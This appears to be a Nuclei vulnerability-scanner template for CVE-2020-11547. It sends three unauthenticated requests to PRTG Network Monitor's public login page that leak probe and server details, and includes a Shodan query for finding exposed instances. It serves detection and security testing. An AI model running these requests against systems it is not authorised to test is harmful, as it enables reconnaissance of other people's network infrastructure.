id: CVE-2020-11547

info:
  name: PRTG Network Monitor <20.1.57.1745 - Information Disclosure
  author: x6263
  severity: medium
  description: PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
    - https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11547
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-11547
    cwe-id: CWE-200
    cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
    epss-score: 0.0011
  metadata:
    max-request: 3
    verified: true
    shodan-query: title:"prtg"
  tags: cve,cve2020,prtg,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/public/login.htm?type=probes"
      - "{{BaseURL}}/public/login.htm?type=requests"
      - "{{BaseURL}}/public/login.htm?type=treestat"

    stop-at-first-match: true
    req-condition: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"

      - type: word
        part: body
        words:
          - "prtg_network_monitor"
          - "Probes"
          - "Groups"
        condition: or

      - type: status
        status:
          - 200

# Enhanced by md on 2023/04/04